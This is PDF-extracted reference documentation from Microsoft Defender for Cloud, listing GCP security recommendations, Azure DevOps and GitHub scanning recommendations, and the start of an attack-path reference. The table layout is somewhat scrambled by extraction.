logs, export them to a SIEM. To keep them longer, it is 
recommended to set up a log sink. Exporting involves 
writing a filter that selects the log entries to export, and 
choosing a destination in Cloud Storage, BigQuery, or Cloud 
Pub/Sub. 

The filter and destination are held in an object called a sink. 
To ensure all log entries are exported to sinks, ensure that 
there is no filter configured for a sink. Sinks can be created 
in projects, organizations, folders, and billing accounts. 


Ensure that the log Google Cloud Platform (GCP) services write audit log entries Low 
metric filter and alerts to the Admin Activity and Data Access logs to help answer 

exist for Audit the questions of, "who did what, where, and when?" within 
Configuration GCP projects. 

changes E Cloud audit logging records information includes the 


identity of the API caller, the time of the API call, the source 
IP address of the API caller, the request parameters, and the 
response elements returned by GCP services. Cloud audit 
logging provides a history of GCP API calls for an account, 
including API calls made via the console, SDKs, command- 
line tools, and other GCP services. 

Admin activity and data access logs produced by cloud 
audit logging enable security analysis, resource change 
tracking, and compliance auditing. 

Configuring the metric filter and alerts for audit 
configuration changes ensures the recommended state of 
audit configuration is maintained so that all activities in the 
project are audit-able at any point in time. 


Ensure that the log It is recommended that a metric filter and alarm be Low 
metric filter and alerts established for changes to Identity and Access Management 

exist for Custom Role (IAM) role creation, deletion and updating activities. 

changes E Google Cloud IAM provides predefined roles that give 


granular access to specific Google Cloud Platform resources 
and prevent unwanted access to other resources. However, 
to cater to organization-specific needs, Cloud IAM also 
provides the ability to create custom roles. Project owners 
and administrators with the Organization Role 
Administrator role or the IAM Role Administrator role can 
create custom roles. Monitoring role creation, deletion and 
updating activities will help in identifying any over- 
privileged role at early stages. 


Recommendation 


Ensure user- 
managed/external keys 
for service accounts are 
rotated every 90 days 
or less Z 


GKE web dashboard 
should be disabled Z 


Legacy Authorization 
should be disabled on 
GKE clusters E 


Redis IAM role should 
not be assigned at the 
organization or folder 
level 2 


Service accounts should 
have restricted project 
access in a cluster Z 


Description 


Service Account keys consist of a key ID (Private_key_ld) and 
Private key, which are used to sign programmatic requests 
users make to Google cloud services accessible to that 
particular service account. 

It is recommended that all Service Account keys are 
regularly rotated. 

Rotating Service Account keys will reduce the window of 
opportunity for an access key that is associated with a 
compromised or terminated account to be used. Service 
Account keys should be rotated to ensure that data cannot 
be accessed with an old key that might have been lost, 
cracked, or stolen. 

Each service account is associated with a key pair managed 
by Google Cloud Platform (GCP). It is used for service-to- 
service authentication within GCP. Google rotates the keys 
daily. 

GCP provides the option to create one or more user- 
managed (also called external key pairs) key pairs for use 
from outside GCP (for example, for use with Application 
Default Credentials). When a new key pair is created, the 
user is required to download the private key (which is not 
retained by Google). 

With external keys, users are responsible for keeping the 
private key secure and other management operations such 
as key rotation. External keys can be managed by the IAM 
API, gcloud command-line tool, or the Service Accounts 
page in the Google Cloud Platform Console. 

GCP facilitates up to 10 external service account keys per 
service account to facilitate key rotation. 


This recommendation evaluates the kubernetesDashboard 
field of the addonsConfig property for the key-value pair, 
‘disabled’: false. 


This recommendation evaluates the legacyAbac property of 
a cluster for the key-value pair, ‘enabled’: true. 


This recommendation evaluates the IAM allow policy in 
resource metadata for principals assigned roles/redis.admin, 
roles/redis.editor, roles/redis.viewer at the organization or 
folder level. 


This recommendation evaluates the config property of a 
node pool to check if no service account is specified or if 
the default service account is used. 


Severity 


Medium 


High 


High 


High 


High 


Recommendation 


Users should have least 
privilege access with 
granular IAM roles % 


Description 


This recommendation evaluates the IAM policy in resource 
metadata for any principals assigned roles/Owner, 
roles/Writer, or roles/Reader. 


GCP Networking recommendations 


There are 45 GCP recom 


Recommendation 


Cluster hosts should be 
configured to use only 
private, internal IP 
addresses to access 
Google APIs % 


Compute instances should 
use a load balancer that is 
configured to use a target 
HTTPS proxy % 


Control Plane Authorized 
Networks should be 
enabled on GKE clusters 7 


Egress deny rule should 
be set on a firewall to 
block unwanted outbound 
traffic? 


Ensure Firewall Rules for 
instances behind Identity 
Aware Proxy (IAP) only 
allow the traffic from 
Google Cloud 
Loadbalancer (GCLB) 
Health Check and Proxy 
Addresses E 


mendations in this category. 


Description 


This recommendation evaluates whether the 
privatelpGoogleAccess property of a subnetwork is set to 
false. 


This recommendation evaluates if the selfLink property of 
the targetHttpProxy resource matches the target 
attribute in the forwarding rule, and if the forwarding rule 
contains a loadBalancingScheme field set to External. 


This recommendation evaluates the 
masterAuthorizedNetworksConfig property of a cluster 
for the key-value pair, ‘enabled’: false. 


This recommendation evaluates whether the 
destinationRanges property in the firewall is set to 
0.0.0.0/0 and the denied property contains the key-value 
pair, 'IPProtocol': ‘all’. 


Access to VMs should be restricted by firewall rules that 
allow only IAP traffic by ensuring only connections 
proxied by the IAP are allowed. 

To ensure that load balancing works correctly health 
checks should also be allowed. 

IAP ensure that access to VMs is controlled by 
authenticating incoming requests. 

However if the VM is still accessible from IP addresses 
other than the IAP it may still be possible to send 
unauthenticated requests to the instance. 

Care must be taken to ensure that loadblancer health 
checks are not blocked as this would stop the 
loadbalancer from correctly knowing the health of the 
VM and loadbalancing correctly. 


Severity 


High 


Severity 


High 


Medium 


High 


Low 


Medium 


Recommendation 


Ensure legacy networks do 
not exist for a project Z 


Ensure ‘log_hostname' 
database flag for Cloud 
SQL PostgreSQL instance 
is set appropriately 7 


Description Severity 


In order to prevent use of legacy networks, a project Medium 
should not have a legacy network configured. 

Legacy networks have a single network IPv4 prefix range 
and a single gateway IP address for the whole network. 
The network is global in scope and spans all cloud 
regions. 

Subnetworks cannot be created in a legacy network and 
are unable to switch from legacy to auto or custom 
subnet networks. Legacy networks can have an impact 
for high network traffic projects and are subject to a 
single point of contention or failure. 


PostgreSQL logs only the IP address of the connecting Low 
hosts. 

The "log_hostname" flag controls the logging of 
"hostnames" in addition to the IP addresses logged. 
The performance hit is dependent on the configuration 
of the environment and the host name resolution setup. 
This parameter can only be set in the "postgresql.conf" 
file or on the server command line. 

Logging hostnames can incur overhead on server 
performance as for each statement logged, DNS 
resolution will be required to convert IP address to 
hostname. 

Depending on the setup, this may be non-negligible. 
Additionally, the IP addresses that are logged can be 
resolved to their DNS names later when reviewing the 
logs excluding the cases where dynamic hostnames are 
used. 

This recommendation is applicable to PostgreSQL 
database instances. 


Recommendation Description Severity 


Ensure no HTTPS or SSL Secure Sockets Layer (SSL) policies determine what port Medium 


proxy load balancers Transport Layer Security (TLS) features clients are 
permit SSL policies with permitted to use when connecting to load balancers. 
weak cipher suites 7 To prevent usage of insecure features, SSL policies should 


use (a) at least TLS 1.2 with the MODERN profile; 

or (b) the RESTRICTED profile, because it effectively 
requires clients to use TLS 1.2 regardless of the chosen 
minimum TLS version; 

or (3) a CUSTOM profile that does not support any of the 
following features: 
TLS_RSA_WITH_AES_128_GCM_SHA256 
TLS_RSA_WITH_AES_256_GCM_SHA384 
TLS_RSA_WITH_AES_128_CBC_SHA 
TLS_RSA_WITH_AES_256_CBC_SHA 
TLS_RSA_WITH_3DES_EDE_CBC_SHA 


Load balancers are used to efficiently distribute traffic 
across multiple servers. 

Both SSL proxy and HTTPS load balancers are external 
load balancers, meaning they distribute traffic from the 
Internet to a GCP network. 

GCP customers can configure load balancer SSL policies 
with a minimum TLS version (1.0, 1.1, or 1.2) that clients 
can use to establish a connection, along with a profile 
(Compatible, Modern, Restricted, or Custom) that 
specifies permissible cipher suites. 

To comply with users using outdated protocols, GCP load 
balancers can be configured to permit insecure cipher 
suites. 

In fact, the GCP default SSL policy uses a minimum TLS 
version of 1.0 and a Compatible profile, which allows the 
widest range of insecure cipher suites. 

As a result, it is easy for customers to configure a load 
balancer without even knowing that they are permitting 
outdated cipher suites. 


Recommendation 


Ensure that Cloud DNS 
logging is enabled for all 
VPC networks £ 


Ensure that DNSSEC is 
enabled for Cloud DNS Z 


Description Severity 


Cloud DNS logging records the queries from the name High 
servers within your VPC to Stackdriver. 

Logged queries can come from Compute Engine VMs, 
GKE containers, or other GCP resources provisioned 
within the VPC. 

Security monitoring and forensics cannot depend solely 
on IP addresses from VPC flow logs, especially when 
considering the dynamic IP usage of cloud resources, 
HTTP virtual host routing, 

and other technology that can obscure the DNS name 
used by a client from the IP address. 

Monitoring of Cloud DNS logs provides visibility to DNS 
names requested by the clients within the VPC. 

These logs can be monitored for anomalous domain 
names, evaluated against threat intelligence, and 

Note: For full capture of DNS, firewall must block egress 
UDP/53 (DNS) 

and TCP/443 (DNS over HTTPS) to prevent client from 
using external DNS name server for resolution. 


Cloud Domain Name System (DNS) is a fast, reliable and Medium 
cost-effective domain name system that powers millions 
of domains on the internet. 

Domain Name System Security Extensions (DNSSEC) in 
Cloud DNS enables domain owners to take easy steps to 
protect their domains against DNS hijacking and man-in- 
the-middle and other attacks. 

Domain Name System Security Extensions (DNSSEC) 
adds security to the DNS protocol by enabling DNS 
responses to be validated. 

Having a trustworthy DNS that translates a domain name 
like www.example.com % into its associated IP address is 
an increasingly important building block of today's web- 
based applications. 

Attackers can hijack this process of domain/IP lookup 
and redirect users to a malicious site through DNS 
hijacking and man-in-the-middle attacks. 

DNSSEC helps mitigate the risk of such attacks by 
cryptographically signing DNS records. 

As a result, it prevents attackers from issuing fake DNS 
responses that may misdirect browsers to nefarious 
websites. 


Recommendation 


Ensure that RDP access is 
restricted from the 
Internet Z 


Description 


GCP Firewall Rules are specific to a VPC Network. Each 
rule either allows or denies traffic when its conditions are 
met. Its conditions allow users to specify the type of 
traffic, such as ports and protocols, and the source or 
destination of the traffic, including IP addresses, subnets, 
and instances. 

Firewall rules are defined at the VPC network level and 
are specific to the network in which they are defined. The 
rules themselves cannot be shared among networks. 
Firewall rules only support IPv4 traffic. 

When specifying a source for an ingress rule or a 
destination for an egress rule by address, an IPv4 address 
or IPv4 block in CIDR notation can be used. Generic 
(0.0.0.0/0) incoming raffic from the Internet to a VPC or 
VM instance using RDP on Port 3389 can be avoided. 
GCP Firewall Rules within a VPC Network. These rules 
apply to outgoing (egress) traffic from instances and 
incoming (ingress) traffic to instances in the network. 
Egress and ingress traffic flows are controlled even if the 
traffic stays within the network (for example, instance-to- 
instance communication). For an instance to have 
outgoing Internet access, the network must have a valid 
Internet gateway route or custom route whose 
destination IP is specified. 

This route simply defines the path to the Internet, to 
avoid the most general (0.0.0.0/0) destination IP Range 
specified from the Internet through RDP with the default 
Port 3389. Generic access from the Internet to a specific 
IP Range should be restricted. 


Severity 


High 


Recommendation 


Ensure that RSASHA1 is 
not used for the key- 
signing key in Cloud DNS 
DNSSEC # 


Description 


DNSSEC algorithm numbers in this registry may be used 
in CERT RRs. 

Zone signing (DNSSEC) and transaction security 
mechanisms (SIG(0) and TSIG) make use of particular 
subsets of these algorithms. 

The algorithm used for key signing should be a 
recommended one and it should be strong. 

Domain Name System Security Extensions (DNSSEC) 
algorithm numbers in this registry may be used in CERT 
RRs. 

Zonesigning (DNSSEC) and transaction security 
mechanisms (SIG(0) and TSIG) make use of particular 
subsets of these algorithms. 

The algorithm used for key signing should be a 
recommended one and it should be strong. 

When enabling DNSSEC for a managed zone, or creating 
a managed zone with DNSSEC, the user can select the 
DNSSEC signing algorithms and the denial-of-existence 
type. 

Changing the DNSSEC settings is only effective for a 
managed zone if DNSSEC is not already enabled. 

If there is a need to change the settings for a managed 
zone where it has been enabled, turn DNSSEC off and 
then re-enable it with different settings. 


Severity 


Medium 


Recommendation 


Ensure that RSASHA1 is 
not used for the zone- 
signing key in Cloud DNS 
DNSSEC % 


Description 


DNSSEC algorithm numbers in this registry may be used 
in CERT RRs. 

Zone signing (DNSSEC) and transaction security 
mechanisms (SIG(0) and TSIG) make use of particular 
subsets of these algorithms. 

The algorithm used for key signing should be a 
recommended one and it should be strong. 

DNSSEC algorithm numbers in this registry may be used 
in CERT RRs. 

Zonesigning (DNSSEC) and transaction security 
mechanisms (SIG(0) and TSIG) make use of particular 
subsets of these algorithms. 

The algorithm used for key signing should be a 
recommended one and it should be strong. 

When enabling DNSSEC for a managed zone, or creating 
a managed zone with DNSSEC, the DNSSEC signing 
algorithms and the denial-of-existence type can be 
selected. 

Changing the DNSSEC settings is only effective for a 
managed zone if DNSSEC is not already enabled. 

If the need exists to change the settings for a managed 
zone where it has been enabled, turn DNSSEC off and 
then re-enable it with different settings. 


Severity 


Medium 


Recommendation 


Ensure that SSH access is 
restricted from the 
internet 2 


Description 


GCP Firewall Rules are specific to a VPC Network. Each 
rule either allows or denies traffic when its conditions are 
met. Its conditions allow the user to specify the type of 
traffic, such as ports and protocols, and the source or 
destination of the traffic, including IP addresses, subnets, 
and instances. 

Firewall rules are defined at the VPC network level and 
are specific to the network in which they are defined. The 
rules themselves cannot be shared among networks. 
Firewall rules only support IPv4 traffic. 

When specifying a source for an ingress rule or a 
destination for an egress rule by address, only an IPv4 
address or IPv4 block in CIDR notation can be used. 
Generic (0.0.0.0/0) incoming traffic from the internet to 
VPC or VM instance using SSH on Port 22 can be 
avoided. 

GCP Firewall Rules within a VPC Network apply to 
outgoing (egress) traffic from instances and incoming 
(ingress) traffic to instances in the network. 

Egress and ingresstraffic flows are controlled even if the 
traffic stays within the network (for example, instance-to- 
instance communication). 

For an instance to have outgoing Internet access, the 
network must have a valid Internet gateway route or 
custom route whose destination IP is specified. 

This route simply defines the path to the Internet, to 
avoid the most general (0.0.0.0/0) destination IP Range 
specified from the Internet through SSH with the default 
Port '22'. 

Generic access from the Internet to a specific IP Range 
needs to be restricted. 


Severity 


High 


Recommendation 


Ensure that the default 
network does not exist in 
a project Z 


Ensure that the log metric 
filter and alerts exist for 
VPC network changes £ 


Ensure that the log metric 
filter and alerts exist for 
VPC Network Firewall rule 
changes E 


Description 


To prevent use of "default" network, a project should not 
have a "default" network. 

The default network has a preconfigured network 
configuration and automatically generates the following 
insecure firewall rules: 


e default-allow-internal: Allows ingress connections 
for all protocols and ports among instances in the 
network. 

e default-allow-ssh: Allows ingress connections on 
TCP port 22(SSH) from any source to any instance 
in the network. 

e default-allow-rdp: Allows ingress connections on 
TCP port 3389(RDP) from any source to any 
instance in the network. 

e default-allow-icmp: Allows ingress ICMP traffic 
from any source to any instance in the network. 


These automatically created firewall rules do not get 
audit logged and cannot be configured to enable firewall 
rule logging. 

Furthermore, the default network is an auto mode 
network, which means that its subnets use the same 
predefined range of IP addresses, and as a result, it's not 
possible to use Cloud VPN or VPC Network Peering with 
the default network. 

Based on organization security and networking 
requirements, the organization should create a new 
network and delete the default network. 


It is recommended that a metric filter and alarm be 
established for Virtual Private Cloud (VPC) network 
changes. 

It is possible to have more than one VPC within a project. 
In addition, it is also possible to create a peer connection 
between two VPCs enabling network traffic to route 
between VPCs. 

Monitoring changes to a VPC will help ensure VPC traffic 
flow is not getting impacted. 


It is recommended that a metric filter and alarm be 
established for Virtual Private Cloud (VPC) Network 
Firewall rule changes. 

Monitoring for Create or Update Firewall rule events 
gives insight to network access changes and may reduce 
the time it takes to detect suspicious activity. 


Severity 


Medium 


Low 


Low 


Recommendation 


Ensure that the log metric 
filter and alerts exist for 
VPC network route 
changes 7 


Ensure that the 
‘log_connections' 
database flag for Cloud 
SQL PostgreSQL instance 
is set to On E 


Ensure that the 
‘log_disconnections' 
database flag for Cloud 
SQL PostgreSQL instance 
is set to 'on' £ 


Description Severity 


It is recommended that a metric filter and alarm be Low 
established for Virtual Private Cloud (VPC) network route 
changes. 

Google Cloud Platform (GCP) routes define the paths 
network traffic takes from a VM instance to another 
destination. The other destination can be inside the 
organization VPC network (such as another VM) or 
outside of it. Every route consists of a destination and a 
next hop. Traffic whose destination IP is within the 
destination range is sent to the next hop for delivery. 
Monitoring changes to route tables will help ensure that 
all VPC traffic flows through an expected path. 


Enabling the log_connections setting causes each Medium 
attempted connection to the server to be logged, along 
with successful completion of client authentication. This 
parameter cannot be changed after the session starts. 
PostgreSQL does not log attempted connections by 
default. Enabling the log_connections setting will create 
log entries for each attempted connection as well as 
successful completion of client authentication which can 
be useful in troubleshooting issues and to determine any 
unusual connection attempts to the server. 

This recommendation is applicable to PostgreSQL 
database instances. 


Enabling the log_disconnections setting logs the end of Medium 
each session, including the session duration. 

PostgreSQL does not log session details such as duration 
and session end by default. Enabling the 
log_disconnections setting will create log entries at the 
end of each session which can be useful in 
troubleshooting issues and determine any unusual 
activity across a time period. 

The log_disconnections and log_connections work hand 
in hand and generally, the pair would be 
enabled/disabled together. This recommendation is 
applicable to PostgreSQL database instances. 


Recommendation 


Ensure that VPC Flow Logs 
is enabled for every 
subnet in a VPC 

Network SZ 


Firewall rule logging 
should be enabled Z 


Description 


Flow Logs is a feature that enables users to capture 
information about the IP traffic going to and from 
network interfaces in the organization's VPC Subnets. 
Once a flow log is created, the user can view and retrieve 
its data in Stackdriver Logging. 

It is recommended that Flow Logs be enabled for every 
business-critical VPC subnet. 

VPC networks and subnetworks provide logically isolated 
and secure network partitions where GCP resources can 
be launched. When Flow Logs is enabled for a subnet, 
VMs within that subnet start reporting on all 
Transmission Control Protocol (TCP) and User Datagram 
Protocol (UDP) flows. 

Each VM samples the TCP and UDP flows it sees, inbound 
and outbound, whether the flow is to or from another 
VM, a host in the on-premises datacenter, a Google 
service, or a host on the Internet. If two GCP VMs are 
communicating, and both are in subnets that have VPC 
Flow Logs enabled, both VMs report the flows. 

Flow Logs supports the following use cases: 1. Network 
monitoring. 2. Understanding network usage and 


optimizing network traffic expenses. 3. Network forensics. 


4. Real-time security analysis 

Flow Logs provide visibility into network traffic for each 
VM inside the subnet and can be used to detect 
anomalous traffic or insight during security workflows. 


This recommendation evaluates the logConfig property 
in firewall metadata to see if it's empty or contains the 
key-value pair ‘enable’: false. 


Severity 


Low 


Medium 


Recommendation 


Firewall should not be 
configured to be open to 
public access E 


Firewall should not be 
configured to have an 
open CASSANDRA port 
that allows generic 
access E 


Firewall should not be 
configured to have an 
open 
CISCOSECURE_WEBSM 
port that allows generic 
access E 


Firewall should not be 
configured to have an 
open 
DIRECTORY_SERVICES port 
that allows generic 

access E 


Firewall should not be 
configured to have an 
open DNS port that allows 
generic access E 


Description Severity 


This recommendation evaluates the sourceRanges and High 
allowed properties for one of two configurations: 


The sourceRanges property contains 0.0.0.0/0 and the 
allowed property contains a combination of rules that 
includes any protocol or protocol:port, except the 
following: 

icmp 

tcp:22 

tcp:443 

tcp:3389 

udp:3389 

sctp:22 


The sourceRanges property contains a combination of IP 
ranges that includes any non-private IP address and the 
allowed property contains a combination of rules that 
permit either all tcp ports or all udp ports. 


This recommendation evaluates the allowed property in Low 
firewall metadata for the following protocols and ports: 
TCP:7000-7001, 7199, 8888, 9042, 9160, 61620-61621. 


This recommendation evaluates the allowed property in Low 
firewall metadata for the following protocol and port: 
TCP:9090. 


This recommendation evaluates the allowed property in Low 
firewall metadata for the following protocols and ports: 
TCP:445 and UDP:445. 


This recommendation evaluates the allowed property in Low 
firewall metadata for the following protocols and ports: 
TCP:53 and UDP:53. 


Recommendation 


Firewall should not be 
configured to have an 
open ELASTICSEARCH 
port that allows generic 
access E 


Firewall should not be 
configured to have an 
open FTP port that allows 
generic access E 


Firewall should not be 
configured to have an 
open HTTP port that 
allows generic access E 


Firewall should not be 
configured to have an 
open LDAP port that 
allows generic access E 


Firewall should not be 
configured to have an 
open MEMCACHED port 
that allows generic 
access E 


Firewall should not be 
configured to have an 
open MONGODB port 
that allows generic 
access E 


Firewall should not be 
configured to have an 
open MYSQL port that 
allows generic access E 


Firewall should not be 
configured to have an 
open NETBIOS port that 
allows generic access E 


Firewall should not be 
configured to have an 
open ORACLEDB port that 
allows generic access E 


Description 


This recommendation evaluates the allowed property in 
firewall metadata for the following protocols and ports: 
TCP:9200, 9300. 


This recommendation evaluates the allowed property in 
firewall metadata for the following protocol and port: 
TCP:21. 


This recommendation evaluates the allowed property in 
firewall metadata for the following protocols and ports: 
TCP:80. 


This recommendation evaluates the allowed property in 
firewall metadata for the following protocols and ports: 
TCP:389, 636 and UDP:389. 


This recommendation evaluates the allowed property in 
firewall metadata for the following protocols and ports: 
TCP:11211, 11214-11215 and UDP:11211, 11214-11215. 


This recommendation evaluates the allowed property in 
firewall metadata for the following protocols and ports: 
TCP:27017-27019. 


This recommendation evaluates the allowed property in 
firewall metadata for the following protocol and port: 
TCP:3306. 


This recommendation evaluates the allowed property in 
firewall metadata for the following protocols and ports: 
TCP:137-139 and UDP:137-139. 


This recommendation evaluates the allowed property in 
firewall metadata for the following protocols and ports: 
TCP:1521, 2483-2484 and UDP:2483-2484. 


Severity 


Low 


Low 


Low 


Low 


Low 


Low 


Low 


Low 


Low 


Recommendation Description Severity 
Firewall should not be This recommendation evaluates the allowed property in Low 
configured to have an firewall metadata for the following protocol and port: 
open POP3 port that TCP:110. 
allows generic access E 
Firewall should not be This recommendation evaluates the allowed property in Low 
configured to have an firewall metadata for the following protocols and ports: 
open PostgreSQL port that TCP:5432 and UDP:5432. 
allows generic access E 
Firewall should not be This recommendation evaluates whether the allowed Low 
configured to have an property in firewall metadata contains the following 
open REDIS port that protocol and port: TCP:6379. 
allows generic access 7 
Firewall should not be This recommendation evaluates whether the allowed Low 
configured to have an property in firewall metadata contains the following 
open SMTP port that protocol and port: TCP:25. 
allows generic access E 
Firewall should not be This recommendation evaluates whether the allowed Low 
configured to have an property in firewall metadata contains the following 
open SSH port that allows protocols and ports: TCP:22 and SCTP:22. 
generic access E 
Firewall should not be This recommendation evaluates whether the allowed Low 
configured to have an property in firewall metadata contains the following 
open TELNET port that protocol and port: TCP:23. 
allows generic access E 
GKE clusters should have This recommendation evaluates whether the uselPAliases Low 
alias IP ranges enabled Z field of the ipAllocationPolicy in a cluster is set to false. 
GKE clusters should have This recommendation evaluates whether the High 
Private clusters enabled? — enablePrivateNodes field of the privateClusterConfig 
property is set to false. 
Network policy should be This recommendation evaluates the networkPolicy field Medium 


enabled on GKE clusters 7 


of the addonsConfig property for the key-value pair, 
‘disabled’: true. 


Next steps 
For related information, see the following: 


e Connect your GCP projects to Microsoft Defender for Cloud 


e What are security policies, initiatives, and recommendations? 


e Review your security recommendations 


Security recommendations for DevOps 
resources - a reference guide 


Article e 09/27/2023 


This article lists the recommendations you might see in Microsoft Defender for Cloud if 


you've connected an Azure DevOps or GitHub environment from the Environment 


settings page. The recommendations shown in your environment depend on the 


resources you're protecting and your customized configuration. 


To learn about how to respond to these recommendations, see Remediate 


recommendations in Defender for Cloud. 


Learn more about Defender for DevOps's benefits and features. 


DevOps recommendations do not currently affect the Secure Score. To prioritize 


recommendations, consider the number of impacted resources, the total number of 


findings and the level of severity. 


DevOps recommendations 


Recommendation 


(Preview) Azure DevOps 
repositories should have 
GitHub Advanced 
Security for Azure 
DevOps (GHAzDO) 
enabled Z 


(Preview) Azure DevOps 
repositories should have 
dependency vulnerability 
scanning findings 
resolved # 


(Preview) Azure DevOps 
repositories should have 
Infrastructure as code 
scanning findings 
resolved 7 


Description Severity 


Defender for DevOps uses a central console to empower High 
security teams with the ability to protect applications and 
resources from code to cloud across Azure DevOps. With 
enablement of GitHub Advanced Security for Azure 

DevOps (GHAzDO) repositories includes GitHub Advanced 
Security for Azure DevOps you get findings about secrets, 
dependencies and code vulnerabilities in your Azure 

DevOps repositories surfaced in Microsoft Defender for 

Cloud. 


Dependency vulnerabilities have been found in code Medium 
repositories. To improve the security posture of the 
repositories, it is highly recommended to remediate these 


vulnerabilities. 


Infrastructure as code security configuration issues have Medium 
been found in repositories. The issues shown below have 

been detected in template files. To improve the security 

posture of the related cloud resources, it is highly 


recommended to remediate these issues. 


Recommendation 


(Preview) Azure DevOps 
repositories should have 
code scanning findings 
resolved Z 


(Preview) Azure DevOps 
repositories should have 
secret scanning findings 
resolved Z 


(Preview) GitHub 
repositories should have 
infrastructure as code 
scanning findings 
resolved 7 


(Preview) GitHub 
repositories should have 
code scanning findings 
resolved Z 


(Preview) GitHub 
repositories should have 
dependency vulnerability 
scanning findings 
resolved Z 


(Preview) GitHub 
repositories should have 
secret scanning findings 
resolved Z 


(Preview) GitHub 
repositories should have 
code scanning enabled € 


Description Severity 


Vulnerabilities have been found in code repositories. To Medium 
improve the security posture of the repositories, it is highly 


recommended to remediate these vulnerabilities. 


Secrets have been found in code repositories. This should High 
be remediated immediately to prevent a security breach. 

Secrets found in repositories can be leaked or discovered 

by adversaries, leading to compromise of an application or 
service. Note: The Microsoft Security DevOps credential 

scanning tool only scans builds on which it has been 

configured to run. Therefore, results may not reflect the 


complete status of secrets in your repositories. 


Infrastructure as code security configuration issues have Medium 
been found in repositories. The issues shown below have 

been detected in template files. To improve the security 

posture of the related cloud resources, it is highly 


recommended to remediate these issues. 


Vulnerabilities have been found in code repositories. To Medium 
improve the security posture of the repositories, it is highly 


recommended to remediate these vulnerabilities. 


GitHub repositories should have dependency vulnerability © Medium 


scanning findings resolved 


Secrets have been found in code repositories. This should High 
be remediated immediately to prevent a security breach. 

Secrets found in repositories can be leaked or discovered 

by adversaries, leading to compromise of an application or 


service. 


GitHub uses code scanning to analyze code in order to Medium 
find security vulnerabilities and errors in code. Code 

scanning can be used to find, triage, and prioritize fixes for 

existing problems in your code. Code scanning can also 

prevent developers from introducing new problems. Scans 

can be scheduled for specific days and times, or scans can 

be triggered when a specific event occurs in the 

repository, such as a push. If code scanning finds a 

potential vulnerability or error in code, GitHub displays an 


alert in the repository. A vulnerability is a problem in a 


Recommendation 


(Preview) GitHub 
repositories should have 
Dependabot scanning 
enabled z 


(Preview) GitHub 
repositories should have 


Description 


project's code that could be exploited to damage the 
confidentiality, integrity, or availability of the project. 


GitHub sends Dependabot alerts when it detects 
vulnerabilities in code dependencies that affect 
repositories. A vulnerability is a problem in a project's 
code that could be exploited to damage the 
confidentiality, integrity, or availability of the project or 
other projects that use its code. Vulnerabilities vary in type, 
severity, and method of attack. When code depends on a 
package that has a security vulnerability, this vulnerable 
dependency can cause a range of problems. 


GitHub scans repositories for known types of secrets, to 
prevent fraudulent use of secrets that were accidentally 


secret scanning enabled: committed to repositories. Secret scanning will scan the 


entire Git history on all branches present in the GitHub 
repository for any secrets. Examples of secrets are tokens 
and private keys that a service provider can issue for 
authentication. If a secret is checked into a repository, 
anyone who has read access to the repository can use the 
secret to access the external service with those privileges. 
Secrets should be stored in a dedicated, secure location 
outside the repository for the project. 


Deprecated recommendations 


Recommendation 


Code repositories 
should have code 
scanning findings 
resolved Z 


Code repositories 
should have secret 
scanning findings 
resolved # 


Code repositories 
should have 


Description 


Defender for DevOps has found vulnerabilities in code 
repositories. To improve the security posture of the 
repositories, it is highly recommended to remediate these 
vulnerabilities. (No related policy) 


Defender for DevOps has found a secret in code 
repositories. This should be remediated immediately to 
prevent a security breach. Secrets found in repositories can 
be leaked or discovered by adversaries, leading to 
compromise of an application or service. For Azure DevOps, 
the Microsoft Security DevOps CredScan tool only scans 
builds on which it has been configured to run. Therefore, 
results may not reflect the complete status of secrets in your 
repositories. (No related policy) 


Defender for DevOps has found vulnerabilities in code 
repositories. To improve the security posture of the 


Severity 


Medium 


High 


Severity 


Medium 


High 


Medium 


Recommendation 


Dependabot scanning 
findings resolved Z 


Code repositories 
should have 
infrastructure as code 
scanning findings 
resolved 7 


GitHub repositories 
should have code 
scanning enabled 7 


GitHub repositories 
should have secret 
scanning enabled 7 


GitHub repositories 
should have 
Dependabot scanning 
enabled Z 


Next steps 


Description 


repositories, it is highly recommended to remediate these 
vulnerabilities. (No related policy) 


Defender for DevOps has found infrastructure as code 
security configuration issues in repositories. The issues 
shown below have been detected in template files. To 
improve the security posture of the related cloud resources, 
it is highly recommended to remediate these issues. (No 
related policy) 


GitHub uses code scanning to analyze code in order to find 
security vulnerabilities and errors in code. Code scanning can 
be used to find, triage, and prioritize fixes for existing 
problems in your code. Code scanning can also prevent 
developers from introducing new problems. Scans can be 
scheduled for specific days and times, or scans can be 
triggered when a specific event occurs in the repository, such 
as a push. If code scanning finds a potential vulnerability or 
error in code, GitHub displays an alert in the repository. A 
vulnerability is a problem in a project's code that could be 
exploited to damage the confidentiality, integrity, or 
availability of the project. (No related policy) 


GitHub scans repositories for known types of secrets, to 
prevent fraudulent use of secrets that were accidentally 
committed to repositories. Secret scanning will scan the 
entire Git history on all branches present in the GitHub 
repository for any secrets. Examples of secrets are tokens 
and private keys that a service provider can issue for 
authentication. If a secret is checked into a repository, 
anyone who has read access to the repository can use the 
secret to access the external service with those privileges. 
Secrets should be stored in a dedicated, secure location 
outside the repository for the project. (No related policy) 


GitHub sends Dependabot alerts when it detects 
vulnerabilities in code dependencies that affect repositories. 
A vulnerability is a problem in a project's code that could be 
exploited to damage the confidentiality, integrity, or 
availability of the project or other projects that use its code. 
Vulnerabilities vary in type, severity, and method of attack. 
When code depends on a package that has a security 
vulnerability, this vulnerable dependency can cause a range 
of problems. (No related policy) 


Severity 


Medium 


Medium 


High 


Medium 


To learn more about recommendations, see the following: 


e What are security policies, initiatives, and recommendations? 
e Review your security recommendations 


Reference list of attack paths and cloud 
security graph components 


Article e 09/05/2023 


This article lists the attack paths, connections, and insights used in Defender Cloud 
Security Posture Management (CSPM). 


e You need to enable Defender CSPM to view attack paths. 
e What you see in your environment depends on the resources you're protecting, 
and your customized configuration. 


Learn more about the cloud security graph, attack path analysis, and the cloud security 
explorer. 


Attack paths 


Azure VMs 


Prerequisite: For a list of prerequisites, see the Availability table for attack paths. 


Attack path display name Attack path description 

Internet exposed VM has high severity A virtual machine is reachable from the internet and 
vulnerabilities has high severity vulnerabilities. 

Internet exposed VM has high severity A virtual machine is reachable from the internet, has 
vulnerabilities and high permission to a high severity vulnerabilities, and identity and 
subscription permission to a subscription. 

Internet exposed VM has high severity A virtual machine is reachable from the internet, has 
vulnerabilities and read permission to a high severity vulnerabilities and read permission to a 
data store with sensitive data data store containing sensitive data. 


Prerequisite: Enable data-aware security for storage 
accounts in Defender CSPM, or leverage Microsoft 
Purview Data Catalog to protect sensitive data. 


Internet exposed VM has high severity A virtual machine is reachable from the internet and 
vulnerabilities and read permission to a has high severity vulnerabilities and read permission 
data store to a data store. 

